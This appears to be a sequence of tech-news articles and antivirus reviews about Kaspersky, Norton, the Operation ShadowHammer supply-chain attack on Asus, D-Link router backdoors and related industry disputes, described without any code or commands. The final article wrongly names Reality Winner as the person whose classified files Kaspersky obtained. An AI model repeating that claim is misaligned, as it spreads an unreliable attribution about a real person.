An antivirus program has to make sure that it is safe from malware in general, so we put it through some simple tests that attempted a modification or deletion of the Kaspersky files. After this testing, we can conclude that this package can certainly protect itself, with none of our attacks causing any harm to the antivirus program.

Other Security Features

Kaspersky Anti-Virus’ most critical element is the core antivirus engine, which blocks malware prior to it threatening your PC. But there’s also the System Watcher, which uses behavior monitoring technology to find undiscovered threats. It has multiple protection layers, which work on a full array of threats, from network attacks, to malicious email objects and phishing attacks.

Kaspersky Anti-Virus also has anti-adware capability. Plus, there’s Kaspersky Secure Connection, a rather rudimentary VPN (from the folks at Hotspot Shield). Sure, we can find a use for a VPN that doesn’t require registration, but its low 200BMB daily data allotment makes  it less than useful for daily usage. The option to upgrade it to unlimited traffic for $4.99 (£3.80) monthly isn’t a huge bargain, since there are a lot of other VPNs (particularly with long-term subscriptions) available for that price or less.

Kaspersky Anti-Virus has a few more tricks up its sleeve. For example, there is the simple on-screen keyboard for entering protected logins of user credentials, account numbers and other private details that demand higher security. We ran it against a number of commercial keylogger software solutions and happily report that none captured our keystrokes.

The Windows Troubleshooting Wizard allows you to search your Windows OS for any damage from malware or revert changes applied to earlier issues. While potentially useful, we don’t know the true breadth of issues examined. With our review PC, the Windows Troubleshooting Wizard did not encounter any new issues, (except for the aforementioned autorun that we already knew about).

Another overpromise is the Browser Configuration Wizard, as this module confines itself to configuring a single browser, Microsoft Edge, not even the browser of choice for many users. At least this browser engine gets utilized by some other applications, so even for alternative browser aficionados, addressing these Edge issues can help secure their system.

The Privacy Cleaner searches for and deletes Windows and activity records from your browsing history, along with cookie lists of Recent Documents, recently run programs, recent folders used and more. While nothing is seriously wrong with this feature, like others in this suite, it’s simply not exceptional, and there is no shortage of dedicated freeware software available that is just as functional.

Another marginal bonus element is Kaspersky Rescue Disk. This bootable environment detects and deletes deeply embedded threats, which can corrupt Windows and prevent booting. While a welcome useful feature, experts will note that this feature is entirely free for all to download from the Kaspersky website; Kaspersky Anti-Virus is merely providing the download link.

Overall, Kaspersky is weak when it comes to bonus features and lags the competition. By way of comparison, Avast Free Antivirus includes a Wi-Fi Inspector that locates wireless vulnerabilities, weak passwords and needed software patches, and Bitdefender Antivirus Plus has a password manager, online banking protection and bootable rescue mode. Most users do not choose an antivirus program based upon bonus elements, but that being said, we would encourage Kaspersky to include additional features in a future edition.

Bottom Line

Kaspersky Anti-Virus 2019 may be missing the full set of bonus features of its competition, but this you may be able to overlook this for a software that excels at accurate anti-malware protection.

Power users will lament the lack of a customizable scan. If that’s important to you, you may want to consider other antivirus solutions, like ESET NOD32 or Norton AntiVirus.

But with its reliable ransomware and general malware protection, coverage of 3 PCs for less than what others change to protect one PC and a free trial that doesn’t require entering your contact info, Kaspersky Anti-Virus is a safe bet.

Image Credits: Kaspersky

MORE: All Security Reviews

MORE: All Security Content

C't today reported that Kaspersky injected a Universally Unique Identifier (UUID) into the HTML source of all web pages without user consent. Previous versions of the antivirus software generated a UUID for each user; a July 11 patch changed it to a not-so-unique identifier but didn't stop the injection.

UUIDs are nearly ubiquitous. Companies use them to identify users, devices, and other entities that need to be tracked. But if these identifiers aren't properly managed, they could be used for nefarious purposes. Bluetooth stopped advertising unique identifiers, for example, because hackers were using them to stalk people. Other companies have taken similar precautions with the tools they use, whether they're UUIDs or something else, as identifiers.

Kaspersky essentially did the opposite. C't said it discovered in June that the antivirus software was injecting a string containing a UUID into every web page they visited. It's not clear why these UUIDs were injected--although one feature that marked certain Google search results as "safe" might be the culprit--or how they were supposed to be used. The company simply generated and injected these UUIDs into web pages without user consent.

C't said it built a simple website capable of collecting these UUIDs before reporting the issue to Kaspersky. Then it told the company about the issue, engaged in a bit of back-and-forth regarding the severity of the problem, and watched as Kaspersky released the patch in July. But further testing showed that Kaspersky hadn't stopped injecting this string into its users' browsing activity; it merely ditched the UUID for a static identifier.

That change does reduce the privacy impact of Kaspersky's code injection. It doesn't completely remove the risk to its customers, though, because knowing that someone uses Kaspersky could still be a valuable piece of information. Anyone relying on previous versions of the antivirus--which likely contain vulnerabilities patched in more recent versions--could be targeted because the tool that was supposed to protect them revealed a weakness.

We said earlier this week that improvements to Windows Defender made it hard to recommend third-party antivirus solutions for Windows 10. Knowing that Kaspersky gave website operators an easy way to track its users without their knowledge or consent makes that recommendation even harder to make. People bought a tool so they could defend their systems, but instead, they got one that intentionally broadcast a unique identifier to the world.

Performance issues, privacy concerns and other problems make it harder than ever to recommend third-party antivirus solutions on Windows. Now it's about to become even more difficult: TechSpot reported that AV-Test, an independent organization that evaluates security products, gave Windows Defender perfect scores across its three evaluation categories after testing 20 antivirus products made for Windows 10 throughout May and June.

AV-Test rated each security offering based on its protection, performance and usability. The highest possible score in each category was six (the organization's use of half-point values results in a 12-point scale). Windows Defender 4.18, F-Secure SAFE 17, Kaspersky Internet Security 19 and Norton Security 22.17 were the only services to receive perfect scores in all three categories. Many others stumbled in several important areas.

This doesn't mean systems running these solutions are impervious to attack. That level of perfection--despite what some may claim--isn't feasible. Instead, these perfect scores means the offerings defended against known threats with a minimal impact on performance and without undue frustration. (More information about how AV-Test evaluates protection, performance and usability is on its website.) Nothing's truly perfect.

These findings show that Windows Defender is just as good as leading third-party antivirus solutions. It's almost enough to make us feel bad for these other companies; it's hard to compete with a well-performing solution that comes bundled with Windows 10 and is made by Microsoft. Just ask Netscape. The main difference is that people can actually benefit from Microsoft's efforts rather than suffering because of its monopolistic impulses.

Antivirus solutions can sometimes create more problems than they solve. Installing them gives another company nearly complete access to a system, and that access can be abused, as "cleaner" utilities have demonstrated. Antivirus solutions can also have their own vulnerabilities for attackers to exploit. Many also prey on non-savvy users to push other services, too, or constantly attempt to get the user's attention for practically no reason.

Windows Defender is supposed to--and according to AV-Test's findings actually does--offer many of the benefits of third-party antivirus solutions without as many of the drawbacks. Microsoft went a bit too far to push Windows Defender a few years ago, which is why it ultimately capitulated to Kaspersky's complaints about anti-competitive practices, but it's hard to argue against good cyber security

Like we said: Windows Defender isn't perfect. It has its own vulnerabilities, and we're sure that some Windows 10 users have been annoyed by the utility, too. But at least people who don't want or can't afford other antivirus solutions have a built-in utility that bests other free options.

Norton AntiVirus has been around since 1991, making it one of the oldest antivirus software solutions.

For this review, we used Norton AntiVirus Basic. However, Norton has since discontinued Basic and replaced it with Norton Antivirus Plus. The two are virtually the same with the same core security features, such as an underlying malware engine and associated services. However, Plus comes with bonus features in 2GB of cloud backup, a web management portal and a two-way firewall.

Norton AntiVirus users also get threat detection of previously identified malware, intelligent behavior monitoring, a file reputation service that spots new hazards and powerful anti-phishing technology. It also includes Norton Identity Safe, which is a password manager but has less features than some competitors.

There are a lot of features, but we found some flaws in the software’s ability to detect new ransomware threats.

Price

The initial annual subscription costs $39.99 for a one-computer, one-year license, with renewals costing $59.99 (about £45) per subsequent year.

First-year rates are equal to Bitdefender but pricier than other competitors. Plus some alternatives offer multiple devices and multi-year license options. For example, Bitdefender offers a three-device, three-year license for $83.99 total. Norton falls short by not offering discounts for additional devices.

Unfortunately, there’s no free trial for Norton AntiVirus. A Norton rep told us there is a 60-day money-back guarantee. However, you’ll still have to pay upfront and having to request the refund is less preferred than a simpler free trial offer.

If you’re willing to pay more, note Norton also offers other antivirus packages:
●    Norton 360 Standard: $8/month, $80/year, one device
●    Norton 360 Deluxe: $10/month, $100/yearr, five devices
●    Norton 360 with LifeLock Select: $15/month, $150/year, five devices
●    Norton 360 with LifeLock Advantage: $25/month, $250/year, 10 devices
●    Norton 360 with LifeLock Ultimate Plus: $35/month, $350/year, unlimited devices

Setup and User Interface

The install process is really easy. However, during our setup process, the software identified another antivirus software which was already installed, Bitdefender, and asked to uninstall it. Although, there was an option to keep it, which we appreciate. We also like that we were warned about a potential issue, and that the user gets to be the final arbitrator of which software goes on their system.

During setup, Norton offers to install some browser extensions. One is Norton Safe Web, which warns users of dangerous websites. The other extension, Norton Identity Safe, gives the functions of a password manager. We consider them both valuable extras, but such software can be found as freeware, so Norton is only adding minimal value.

With the suite fully installed, it occupied 1.6GB of disk space, more than many competitors. Thankfully, with the larger C: drives these days, this shouldn’t be an issue. And Norton did not negatively impact our system resources otherwise. Plus, this software comes with 2GB of free online storage; although that is a very small amount of space.

Examining our test PC’s background processes we found only three, including the Chrome extension host, consuming less than 50MB of RAM, and they ran perfectly fine with no system slow downs.

Norton AntiVirus offers plenty of options and controls. The complete details of your PC’s protection status are cleanly displayed, which includes the timing for your last update and scan with buttons that get grouped into functional groups, including Security, Online Safety and Backup. Clicking on the buttons displays additional options, with total control of all the antivirus settings.

Antivirus Scans

We found Norton’s scan tool simultaneously comprehensive and easy to use. Checking your system is as easy as clicking Security -> Scans, to start a scan immediately. There’s a choice of available modes: Quick or Full. plus a Custom Scan option to focus the scan on specific drives, folders or files to clear out malware.

Norton missed the mark by lacking options for lower level scans, like Avast or Avira. These competing programs offer more than just an archives scan, also allowing the user to specify the types of archives and the depth of nesting to support them (i.e., how many open archives). Still, the average user will be okay with what Norton offers.

For example, you can create a custom scan, such as one that checks D:Files and E:More and skip certain scan types, like rootkits or tracking cookies, to save time. Running can be automated with specific parameters, like when the system is idle and on AC power, for example.
You can also control what happens upon scan completion, including turning off the PC or putting it into sleep mode. While power users may find additional options elsewhere, mainstream users will be able to easily comprehend and use these custom features.

Performance-wise, scans use multiple CPU threads; however Norton is not overly grabby of system resources and will give back those threads when needed for another demanding application to optimize system performance.

Antivirus Testing and Performance

Overall, Norton’s speeds were quite excellent. It also detected all of our test threats, without any false alarms -- a powerful combination for an antivirus software package.

Our own custom ransomware-like program works through a tree of test folders, opening and encrypting common images, videos and other documents. Since we created it and it’s a novel threat, Norton has not encountered it before, making it an excellent test of the software’s ability to detect and block ransomware by behavior only and without relying on the database of virus signatures for malware identification.

Norton fizzled when it came to handling our custom ransomware. With the executable test, the ransomware rapidly ground to a stop, which seemed encouraging. However, as we delved deeper, we found that the ransomware had encrypted some files. We were even more frustrated when we figured out that Norton provided neither an alert nor a pathway to recover the files.

We tempted fate and reran our custom ransomware. That resulted in identical performance, with the encryption of a few files before the ransomware went away with zero warnings.

After the third time running our ransomware, Norton shut it down and displayed an alert with information that a threat was neutralized.

On one hand, Norton detected and blocked the solitary ransomware. But on the other hand, this occurred with no warning, and there was potential for data loss with the time that elapsed before the detection and deletion of our ransomware. On our PC, the ransomware we ran successfully encrypted 454 files before Norton neutralized it. Competitor Kaspersky showed better performance, stopping our ransomware after the encryption of a handful of files and recovering the originals without loss of any data.

With testing finished, we assessed Norton’s impact on our system’s performance, with quite favorable results. Looking at the 2018 Consumer Security Products Performance benchmarks with PassMark Software, Norton’s impact on system performance was the lowest among the 15 contenders and performed superior to the minimal-impact Windows Defender. Therefore, while performance of a given software on any PC can be difficult to predict, Norton runs better than most, making this a strong contender for an older system.

Other Security Features

Norton Antivirus also includes the Norton Power Eraser feature. It’s an effective tool for more complicated problems that would elude a standard scan. The algorithm dives deep to seek out stealthier threats.

If you’re unsure of where to look to locate a possible threat, there’s Norton Insight, a tool that scans processes to quickly highlight any possible malware, at least worth a closer look.

The browser extension protection from malware is more clunky compared to the sleek software solution. However, Norton still excels at URL blocking, making this extension well worth installation if your browser doesn’t don’t already have this type of software.

Additionally, you’ll find bonus tools that are useful for junk files deletion, hard drive defragging and startup program management. These programs are hardly an afterthought and can go toe-to toe with their competitors. For example, the Startup Manager can not only list the startup programs, but also display the number of other Norton users using them. Furthermore, it allows the user to specify a delay in startup to smooth out the boot process and also gives the option to turn them off. Still, power users will point out that freeware tools, including CCleaner, provide plenty of PC maintenance functionality.

Bottom Line

Norton AntiVirus has inherent advantages, such as being accurate, low on system resources, quick and flexible.

However, alternative antivirus solutions Bitdefender and Kaspersky demonstrated better performance on the critical tasks of ransomware and file recovery.

But if you’re looking for an antivirus software with minimal impact on your PC, Norton still has quite a high virus detection rate in general.

Image Credits: Norton

MORE: All Security Reviews

MORE: All Security Content

Security company Kaspersky discovered that Asus’ Live Update tool was infected with malware by malicious actors. However, it seemed unlikely that Asus would be the only company to be targeted in such a way. Kaspersky confirmed this today by uncovering six other companies that were targets of the same Operation ShadowHammer.

Operation ShadowHammer Infected Multiple Software Tools

Kaskerspy researchers, via the SecureList blog, said that the newly found malware samples leveraged algorithms that are similar to those used in the attack against Asus. 

One of the companies impacted, Electronics Extreme, makes the survival game Infestation: Survivor Stories. The second, Innovative Extremist, is a web and IT infrastructure services provider that has also worked in game development. The third company, Zepetto, is from South Korea and made the video game Point Blank.

According to Kaspersky’s researchers, the attackers either had access to the source code of thee companies’ software or were able to infect their software during compilation. The hackers could have infiltrated the networks of these companies. The researchers noted that this reminded them of how the CCleaner attack happened. Avast’s CCleaner update servers were infiltrated in a similar way, exposing millions of users to a trojanized CCleaner update.

Kaspersky said that three other South Korean companies were targeted, including another video game company, a conglomerate holding company and a pharmaceutical firm. The cybersecurity firm didn't share their names.

How Operation ShadowHammer Worked

Kaspersky researchers noted that the compromised video games of the first three companies targeted by Operation ShadowHammer were capable of gathering information about usernames, computer specs and configurations and operating system versions.

After being launched on the victims’ systems, the infected games would first check if certain traffic/processor monitoring tools were running and if the language used by the system was Simplified Chinese or Russian. If any of these were true, the malware within the games would stop running. Otherwise, it would collect the aforementioned system information and more.

The compromised software could also be used to download new malicious payloads from the attackers’ command and control servers. The list of potential victims was not limited to a list of MAC addresses, as was the case with the attack against Asus’ Live Update tool.

The attackers were able to infect these companies’ software via valid digital certificates, which were used to compromise their development environments. Kaspersky recommends these companies and others in their position not to rely only on digital signatures for the security of their software but also to analyze the software code properly even after the code is digitally signed.

The Kaspersky researchers also warned that there may be many more companies that were targeted by the same group, but the number is currently not known. However, if Operation ShadowHammer succeeded in infecting popular developer tools, then any company that uses those affected developer tools would also be infected.

Microsoft's products are practically ubiquitous. Sure, Internet Explorer is no longer synonymous with the Internet for many people, but the company's Office productivity suite remains a staple for many Windows users. That's great for Microsoft, but Kaspersky Labs' report that 70 percent of the cyberattacks it saw in the fourth quarter of 2018 targeted Office vulnerabilities suggests that it might not be great for the software's users.

Kaspersky presented these findings at its Security Analyst Summit in Singapore last week; ZDNet reported on the presentation on Monday. According to the publication, Kaspersky said Office was involved in just 16 percent of attacks in Q4 2016. That number quadrupled in just two years, and unless there are some dramatic changes with the productivity suite or its popularity, there's little reason to believe it will fall anytime soon.

Not all of the attacks involving Office vulnerabilities actually rely on flaws in the software itself. Kaspersky noted that attacks will often exploit issues with related components in Windows, or they'll use Office files to make their way onto a target device. Even people who manage to avoid Office typically have to deal with its file types--documents are sent as ".docx", spreadsheets as ".xlsx" and presentations as ".pptx". That's just how it is.

That means that Microsoft's efforts to secure Office are in some ways limited by factors outside its control. Promising improved security for people who opt for Office 365 instead of the standalone versions of its software is better than nothing, sure. (Even if it seems a bit silly to pit the products against each other.) But it can't stop attackers from disguising a malicious file as a Word document or sneaking malware into a PowerPoint slide.

This ubiquity, combined with the ease with which attackers can exploit Office vulnerabilities, makes the rise in attacks involving Office seem like an inevitability. Kaspersky reportedly said there's an entire crime network built around Microsoft's productivity suite. That means there's serious economic incentive to discover Office vulnerabilities, exploit them, sell the exploits and then repeat the process once a given security flaw is fixed.

Maybe that would change if Office were no longer synonymous with office work. But the productivity suite has withstood increasing competition far better than Internet Explorer did, and even if it's dethroned, people are still going to use Office file formats until they simply can't do so anymore. Microsoft, Kaspersky, and other companies simply have to manage each problem as it pops up to the best of their collective ability.

Earlier this year Kaspersky Labs revealed Operation ShadowHammer, which used a modified version of the Asus Live Update Utility to compromise up to 1 million devices in what the security firm called "one of the biggest supply-chain incidents ever." Asus disputed the attack's scope, but it also confirmed that the attack did happen, and today it announced the adoption of a new digital certificate structure for its many software offerings.

Operation ShadowHammer's malicious utility was hard to detect because it was the same size as the official version, hosted on Asus servers, and signed with a legitimate certificate. Now the company has said that it's implementing "a tiered certificate structure that upgrades the security infrastructure of our expanding software ecosystem" which "requires the current code-signing certificate of several Asus products to be revoked."

This won't be a seamless transition. Asus said that switching to the new certificate structure would cause Windows to warn people when they use certain utilities, or prevent that software from working normally when someone tries to launch the "Setup.exe" or "AsusSetup.exe" files. People will have to download new versions of the software affected by this change if they want everything to function the way they've grown accustomed to.

But the company didn't offer a complete list of utilities affected by this change--all it said was that Aura, AI Suite III and GPU Tweak II are on that list. All of the software updates are available from a page on the Asus website, but the complete list of affected offerings is hidden behind menus upon menus, so it's hard to tell exactly how many programs are affected by this change.

Asus said there are four scenarios where this change will affect its customers. The first is when people use its programs, which leads to the problems explained above. The second prevents the installation of third-party drivers from an Asus support CD unless someone runs "Setup.exe" instead of "AsusSetup.exe." The third can prevent the CD from loading in the first place. And the fourth occurs when Windows is booted up.

That last issue only affects people whose motherboards are running Armoury Crate or Q-installer. Asus said Windows will show a warning about running Armoury Crate at boot; the only ways to continue are to stop using Armoury Crate or update the BIOS. Here's how to do the latter:

"To do this, first restart your PC, and then press the Delete (Del) or F2 key when prompted during the startup process. Now navigate to the ‘Tools’ tab and then select the ‘ASUS Armoury Crate’ category. Then choose the ‘Disable the Download & Install ARMOURY CRATE app’ option. To save these changes and restart the system, press the F10 key, then press Y when prompted. Alternatively, navigate to the ‘Save and Exit’ option within the BIOS menu, press the Enter key, then press Y to save changes and restart."

Hopefully the new certificate structure justifies these (mostly minimal) hassles by preventing attacks like Operation ShadowHammer in the future. It won't completely solve Asus' problems--the company's employees reportedly exposed their account credentials on GitHub--but at least it's a start.

Asus acknowledged today the recent takeover of its Live Update Utility for the company’s notebooks by an advanced persistent threat (APT) group and said that it has released an updated version (version 3.6.8) of its utility that is clean of the hacking group’s malware. The company also included long overdue encryption and security features to prevent similar attacks in the future, such as end-to-end encryption and other verification mechanisms.

"A small number of devices have been implanted with malicious code through a sophisticated attack on our Live Update servers in an attempt to target a very small and specific user group. ASUS customer service has been reaching out to affected users and providing assistance to ensure that the security risks are removed," the statement said, in addition to offering a link to download its diagnostic tool and encouraging concerned users to contact customer service (without listing contact information). 

Asus Live Update Utility Hacked by APT Group

Kaspersky Labs this week announced it uncovered a sophisticated attack against Asus’ update software that was going on between June and November 2018. The security company called the attack the largest of its kind since a similar takeover of CCleaner’s update server happened, with up to 1 million users impacted.

According to a Bloomberg report earlier today, Asus said the number of impacted users is in the hundreds, despite Kaspersky believing it to be up to 1 million were affected. However, Kaspersky was able to see 57,000 of its own customers were using the infected tool, and as reported by Motherboard, Symantec also said that 13,000 of its customers were using the hacked utility. Therefore, it seems that at the minimum, 70,000 PCs were affected by the malicious hack, but this is only a small fraction of the devices that Kaspersky and Symantec were able to analyze.

Asus neglected to give credit to Kaspersky for discovering the attack in today's statement, and it appears that it also ignored Kaspersky's initial disclosure of the attack. Eventually, the company reportedly asked Kaspersky to sign an NDA.

Kaspersky told Asus of the attack in January and published the story yesterday on Seclist and its blog. Now, Asus has released a patch for its software, as well as a diagnostic tool for Asus notebook customers that want to verify whether or not their Live Update software was infected with malware.

Has Asus Learned Its Lesson?

Back in 2016, a report came out that revealed how the top 5 notebook makers, including Asus, were ignoring security best practices for their devices that would have prevented this type of attack. Asus, one of the worst offenders among the vulnerable laptop makers, was guilty of not even using HTTPS encryption or signing or validating their software updates.

At the time, the researchers that revealed this also found other critical vulnerabilities in these companies’ update tools that would have made it easy even for non-technical malicious hackers to infect targeted machines.

The chief of NSA’s TAO group also said in the past that exploiting OEMs’ software for notebooks is one of the easiest ways to hack a computer, because of how vulnerable these software tools tend to be and how little care laptop vendors tend to have for security in general.

In this case, not only did Asus ignore this issue for the past three years despite being warned about it by security researchers, but the company seemingly ignored it once again when existing attacks and not just theoretical ones, were showed to it by Kaspersky.

Due to what seems to be mainly Kaspersky’s insistence on revealing the APT group’s attack to the public and fear of the press’ reaction, Asus was finally dragged kicking and screaming into updating its software with the proper modern security features that it should have used since at least 2016, after the aforementioned report came out.

The antivirus companies found Asus' update software to be vulnerable only for a limited period of time, but this may have been a strategy by the hacking group to minimize its exposure. However, chances are that Asus may not be the only laptop maker with a PC utility that has been infected, at least temporarily and without getting caught by various sophisticated hacking groups.

Asus has responded to Kaspersky Labs' report yesterday that an unidentified threat actor used the Asus Live Update Utility to compromise up to 1 million devices. The cybersecurity company also released a diagnostics tool to help its customers figure out if they were affected by the attack and is reportedly contacting customers that it knows were affected to help them recover.

Kaspersky named the attack Operation ShadowHammer and said it was the largest supply chain attack since CCLeaner attack of 2017, with 57,000 devices confirmed affected and more than 1 million believed to have been so. Why? To compromise just 600 yet-to-be-identified devices. (That's an extra 1,666 people affected for each actual target.)

The security company said that an attacker compromised the Asus Live Update Utility and distributed it to the manufacturer's devices. The malicious version of the utility was said to feature the same file size as the original, was signed with a legitimate certificate and was hosted on Asus' server. It would've been hard for anyone to spot.

Asus responded to Kaspersky's report late that same day of Kaspersky's revelation. According to Bloomberg, the company said that "only several hundred" PCs were infiltrated, not 1 million. It also said that it helped its customers fix the problem, patched the vulnerability that allowed the Asus Live Update Utility to be taken over and updated its servers after the attack.

We don't have enough information to say which company is more accurate. Both are likely to stick to their own findings: reporting on large-scale attacks helps security companies like Kaspersky advertise their services; manufacturers like Asus might want to downplay attacks to avoid the inevitable lawsuits, bad press and other issues.

Still, in Motherboard's report on Operation ShadowHammer, the outlet noted that Symantec corroborated Kaspersky's findings.

We also haven't seen mention of Operation ShadowHammer on Asus' U.S. site--the company appears to be handling the issue as quietly as possible.

Kaspersky is set to reveal more information about the attack at the SAS 2019 conference on April 8.

Kaspersky Labs revealed today that an unidentified threat actor modified the Asus Live Update Utility to gain access to target devices. The security firm said this attack, which it dubbed Operation ShadowHammer, "seems to be one of the biggest supply-chain incidents ever," after the CCleaner attack of 2017.

The researchers said that someone modified the Asus Live Update Utility, added a back door and then distributed it via official channels. This malicious version of the tool was hosted on the Asus update server and signed with a legitimate certificate. It also had the same file size as the official version of the utility.

All those precautions made the malicious version of the Asus Live Update Utility incredibly difficult to detect. (Kaspersky managed it, though, which is why disclosures like these are also thinly veiled advertisements.) The company said it detected the malware on 57,000 devices but estimated that 1 million were affected.

Yet, the unidentified threat actor only appeared to be interested in a very small subset of those devices: Kaspersky said they "targeted only 600 specific MAC addresses, for which the hashes were hardcoded into different versions of the utility." That means as many as 1 million people were compromised to target just 600.

The supply chain attack was first reported by Motherboard, which said it sent Asus three emails about Kaspersky's findings but hasn't received a response. The outlet noted that Symantec confirmed Kaspersky's findings and offered more details about how the researchers were finally able to uncover this attack.

Kaspersky said that "the same techniques were used against software from three other vendors" and added that it notified them about the attack, but it didn't say who the vendors are or how they responded. We suspect more information will be revealed after they've had a chance to protect their users.

More information about this attack is available on Kaspersky's Securelist website. The company also plans to present more details about the attack at the SAS 2019 conference on April 8 in Singapore. It will publish a full report to Securelist at that time as well--hopefully with details about the three other vendors.

Kaspersky announced this week that it has filed an anti-trust complaint against Apple with the Russian Federal Antimonopoly Service (FAS) over the Apple App Store by banning features from the Kaspersky Safe Kids parental control app. The cybersecurity company accused Apple of issuing the ban only after announcing its own parental control software for iOS users, Screen Time 

According to Kaspersky, it received a notice from Apple last year saying that the configuration profiles of the Kaspersky Safe Kids app were no longer meeting the requirements of App Store’s policies. However, Kaspersky said Apple never had a problem with its application before this.

The removal and general ban of configuration profiles meant the elimination of two key features of Kaspersky’s app, including app control and Safari browser blocking, Kaspersky said. According to the security firm, these features are essential. The first feature allows parents to block apps they don’t want their kids to run. The second one blocks all browsers on the device except for Kaspersky’s kid-safe browser.

Restrictions Following Launch of Apple Screen Time

Kaspersky said Apple blocked the features of its parental control app after launching its own version of a parental control application, Screen Time. Screen Time allows users to set application restrictions, such as when and for how long an app can be used throughout the day.

Kaspersky believes Apple's restrictions to the Safe Kids app following the launch of Screen Time constitutes an abuse of power worthy of an antitrust complaint in Russia. Apple controls the distribution channel for iOS applications and can leverage this power to enter various markets -- in this case, the parental control software market. Kaspersky’s argument is that by banning or crippling competitors, Apple will become a monopoly in this or other markets.

"From our point of view, Apple appears to be using its position as platform owner and supervisor of the sole channel for delivering apps to users of the platform to dictate terms and prevent other developers from operating on equal terms with it. As a result of the new rules, developers of parental control apps may lose some of their users and experience financial impact," Kaspersky said in its blog post, adding that it "repeatedly" tried to contact Apple but did not reach any "meaningful negotiations." 

Reining In On Monopolies

Kaspersky also filed an antitrust complaint against Microsoft in 2017, accusing it of leveraging monopoly power in the PC market and using questionable tactics to promote its own Windows antivirus software over third-party ones. Eventually, Kaspersky withdrew the complaint.

This month, Spotify filed its own antitrust complaint against Apple in the European Union over the high commission fee Apple charges music streaming service providers. Spotify’s argument is that Apple charges this fee while offering a similar service unimpeded by the samefee. 

U.S. Senator Elizabeth Warren this month proposed that large companies that become monopolies and own distribution channels should not be allowed to publish their own products on those platforms. The argument is that this incentivizes the platform owners to change the platform’s rules so that their own products are recommended above those of competitors.

The European Commission (EC) charged Google with something similar last year in the Android antitrust case, as well as the Google Shopping antitrust case in 2017. In both of those cases, the EC accused Google of using its leverage over the platform to promote its own products. And this week, the EU hit Google with a  €1.5 billion fine over online advertising practices. 

Kaspersky Labs identified two hardcoded backdoor accounts and two security flaws in D-Link DIR-620 routers.

Despite being a terrible security practice, it’s actually not that uncommon for router or surveillance camera companies to have hardcoded default credentials in their devices. Besides the potential for abuse from the companies themselves, this practice exposes users to all sorts of attackers, from botnet owners to nation states. The hardcoded credentials make it trivial to hack these devices once attackers learn about them.

According to Kaspersky’s researchers, the hardcoded account cannot be changed by the routers’ administrators. This probably means it was never meant to be seen by users and that the account is purposely made to allow D-Link employees to remotely log in to the routers. Kaspersky also discovered yet another backdoor account for Telnet, which could have given attackers administrative access to the routers.

One of the vulnerabilities Kaspersky found in D-Link’s DIR-620 routers allows for a cross-scripting (XSS) attack. The D-Link developers seem to have missed filtering certain special characters, which can now allow attackers to deliver an exploit by sending malicious code to the routers. Another vulnerability is an operating system command injection, which is the result of incorrect processing of input data.

D-Link Needs To Step Up Its Security Game

Although the two vulnerabilities are not too sophisticated, and D-Link developers should have been able to dodge them, the bigger issue is the hardcoded backdoor accounts. After many years, or decades even, of seeing such accounts being taken over by attackers, D-Link should have known better than to have them in its routers.

Kaspersky researched the DIR-620 router because it's a common router used by millions of people in Russia, as it's a router sold directly to ISPs, who then give it to their customers. However, as D-Link uses the same firmware on multiple router line-ups, it's possible the same type of vulnerabilities exist in other D-Link routers, too.

When it announced its Platform Security Architecture for IoT devices last year, Arm said that “security can no longer be optional.” Now, shortly after it announced the iSim SoC that's supposed to connect more devices to the IoT, the company revealed more about the PSA framework.

The Internet Of Threats

Kaspersky co-founder Eugene Kaspersky called the IoT the “Internet of Threats” in 2015, and as we’ve seen in the years since, his description wasn’t too far off. Poorly secured IoT devices have enabled massive DDoS attacks that took out major internet services, and that may be just the beginning, because we’re still in the early days of IoT boom.

Arm promised to enable over a trillion internet-connected IoT devices by 2035. We don’t know yet what it could mean if malicious actors would control even a small fraction of that, but it probably won’t be a pretty sight.

To make things worse, attackers may have found even bigger incentives to take-over IoT devices: cryptojacking, which sees attackers take over target devices and use them to mine cryptocurrencies they can then sell for a profit. IoT devices may not be remotely as powerful as PCs, but if attackers took over several billion of them, they could probably make a decent amount of money.

The good news is that Arm seems to take this issue quite seriously, or at least more seriously than individual device makers seem to take it right now, because many of them tend to have little incentive to enable strong security for their devices. Arm has announced multiple security-oriented projects lately, including its CryptoIsland secure enclave IP family as well as the PSA.

Platform Security Architecture

According to Arm, the PSA aims to provide a holistic set of security guidelines for the IoT ecosystem, from chip makers to device developers, so they can successfully implement security features. When it launched the PSA framework last year, Arm announced three main components: IoT threat models and security analyses, hardware and firmware specifications, and a reference open-source device firmware.

Today, Arm announced the first stage of the PSA framework with the release of the first set of Threat Models and Security Analyses (TMSA) documentation. The company also published threat model analyses for three types of IoT products: a smart water meter, a web camera, and an asset tracking device. Device makers can look at these examples to see how they should implement security features with their IoT products.

Additionally, Arm announced that the first open-source build of its reference firmware called Trusted Firmware-M, which conforms with the PSA specification, will be released in March 2018. The company will continue to develop and improve the open-source firmware after the release, too.

Securing The Next Trillion IoT Devices

Arm still has some work to do to complete the launch of the PSA framework. The company’s plan is to start by releasing the first PSA architectural document, which is called the Trusted Base System Architecture-M (TBSA-M). The document is currently in active review with some key partners, and it provides guidance on hardware security features to silicon designers.

Another step in the evolution of the PSA framework will be building an ecosystem of developers interested in making PSA-compliant devices. Arm plans to enable high-level security APIs on which companies can depend when building secure IoT devices. The company is also working on a Compliance & Certification Program, which should make it easier for manufacturers to build secure devices and for consumers to identify which IoT devices are worth their money.

Kaspersky announced that it launched a lawsuit against the Trump administration arguing that the U.S. government’s ban of its software lacked due process and evidence of harm.

Kaspersky's Ban On U.S. Federal Networks

This September, the Department of Homeland Security (DHS), issued a directive to civil agencies to stop using Kaspersky software within 90 days after concerns that the antivirus may help the Russian government in infiltrating U.S. networks and stealing sensitive information.

The government previously accused Kaspersky of stealing classified information from a national security whistleblower called Reality Winner. Kaspersky admitted that it got the documents in a routine scan of Winner’s personal computer, but it said it immediately deleted those files once it learned what they were. It also offered to allow independent parties to review its antivirus’ source code, but the government didn’t think that was sufficient.

Last week, the new National Defense Authorization Act of 2018 included a clause that would ban any Kaspersky or Kaspersky-associated software from being used in the U.S. federal government. Guilty or not, this seems to have left Kaspersky no choice but to sue the U.S. government in order to save its reputation (and revenue).

Kaspersky’s Open Letter

Along with the lawsuit, Kaspersky also wrote an open letter to the U.S. government. The company argued that it has not been given the opportunity to defend itself properly before its technology was banned from use on federal networks. This has harmed its reputation and revenue, and Kaspersky believes that such actions violated the U.S. Constitution, more specifically the right to due process.

The company said that the U.S. government relied mainly upon uncorroborated media reports, not evidence, to support its conclusion that the Kaspersky antivirus is a security risk for U.S. federal networks.

Kaspersky also noted that although the revenue it obtained from licensing its software to U.S. federal agencies was only a small percentage of its revenue, the ban on its software had a disproportionate negative effect both in the U.S. as well as globally.

